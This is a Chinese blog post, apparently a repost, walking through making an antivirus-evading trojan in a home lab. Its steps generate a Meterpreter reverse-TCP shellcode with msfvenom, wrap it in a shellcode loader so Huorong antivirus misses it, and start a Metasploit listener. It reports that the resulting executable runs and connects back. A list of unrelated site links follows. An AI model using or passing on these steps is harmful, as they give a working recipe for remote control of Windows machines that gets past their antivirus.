作者:@11阳光
本文为作者原创,转载请注明出处:https://www.cnblogs.com/sunny11/p/14105624.html
题记
今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。
环境
Kali:192.168.0.119 win10:192.168.0.200
工具地址:https://github.com/knownsec/shellcodeloader
步骤
1、在kali生成3.bin木马。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin


2、把木马移到工具上做免杀。



生成loder.exe软件,可随意改名,运行就能上线。

3、kali开启监听。
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.119
exploit
然后运行exe
上线

4、火绒检测

软件运行后检测。

【类型】在资源管理器中,对文件按照“类型”排序,实际上 就是按照文件扩展名排序。
【转载】在python的class中的,self到底是什么?
【转载】Windows 10系统默认将画面显示比例调整至125%或150%,最高分辨率已经达到3840×2160(4K)这一级别。
[转载]层叠与并排win10
【转载】浏览器测试工具有哪些 浏览器安全性能内核兼容测试工具推荐
【转载】我常用的地址,现记录一下,遗忘时或换电脑时查询
【转载】浏览器测试基本跑分网站
【转载】Python 代码调试技巧
HDU 2446 Shell Pyramid(二分查找 数学)
Copyright © 2011-2022 走看看